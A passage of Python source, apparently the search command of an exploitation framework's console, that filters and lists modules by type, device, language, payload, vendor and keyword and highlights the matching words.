"You can specify options. e.g. 'search type=exploits device=routers vendor=linksys WRT100 rce'"
)
return
for (key, value) in kwargs.items():
if key == 'type':
if value not in existing_modules:
print_error("Unknown module type.")
return
# print_info(' - Type :\t{}'.format(value))
mod_type = "{}.".format(value)
elif key in ['device', 'language', 'payload']:
if key == 'device' and (value not in devices):
print_error("Unknown exploit type.")
return
elif key == 'language' and (value not in languages):
print_error("Unknown encoder language.")
return
elif key == 'payload' and (value not in payloads):
print_error("Unknown payload type.")
return
# print_info(' - {}:\t{}'.format(key.capitalize(), value))
mod_detail = ".{}.".format(value)
elif key == 'vendor':
# print_info(' - Vendor:\t{}'.format(value))
mod_vendor = ".{}.".format(value)
for module in self.modules:
if mod_type not in str(module):
continue
if mod_detail not in str(module):
continue
if mod_vendor not in str(module):
continue
if not all(word in str(module) for word in keyword.split()):
continue
found = humanize_path(module)
if len(keyword):
for word in keyword.split():
found = found.replace(word,
"\033[31m{}\033[0m".format(word))
print_info(found)